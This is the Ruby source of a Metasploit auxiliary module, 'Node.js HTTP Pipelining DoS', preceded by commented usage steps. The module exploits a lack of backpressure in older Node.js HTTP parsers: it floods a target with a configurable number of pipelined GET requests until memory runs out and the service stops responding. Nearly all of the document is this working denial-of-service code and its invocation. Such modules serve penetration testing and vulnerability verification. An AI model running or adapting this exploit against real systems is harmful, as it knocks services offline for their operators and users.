#$ node -e "require('http').createServer(function(req, res){res.end();}).listen(9090);"
#msf> use auxiliary/dos/http/node_pipelining
#msf> set RHOST 127.0.0.1
#msf> set RPORT 9090
#msf> set RLIMIT 10000000 # depends on your machine
#msf> run
#...
#
#[*] DoS successful. 192.168.0.4:9090 not responding.
#
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Node.js HTTP Pipelining DoS',
'Description' => %q{
This module exploits a DoS in the HTTP parser of Node.js versions
released before 0.10.21 and 0.8.26. The vulnerability is caused by a
lack of backpressure on pipelined requests, causing unbounded memory
allocation for each request.
},
'Author' => [ 'titanous', 'Marek Majkowski' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://github.com/joyent/node/issues/6214' ],
],
'DisclosureDate' => 'Oct 18 2013'))
register_options(
[
Opt::RPORT(80),
OptInt.new('RLIMIT', [true, "Number of requests to send", 1000])
],
self.class)
end
def run
host = datastore['RHOST']
host += ":" + datastore['RPORT'].to_s if datastore['RPORT'].to_i != 80
payload = "GET / HTTP/1.1\r\n"
payload << "Host: #{host}\r\n\r\n"
begin
connect
datastore['RLIMIT'].times { sock.put(payload) }
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Unable to connect to #{host}.")
rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
print_status("DoS successful. #{host} not responding.")
ensure
disconnect
end
end
end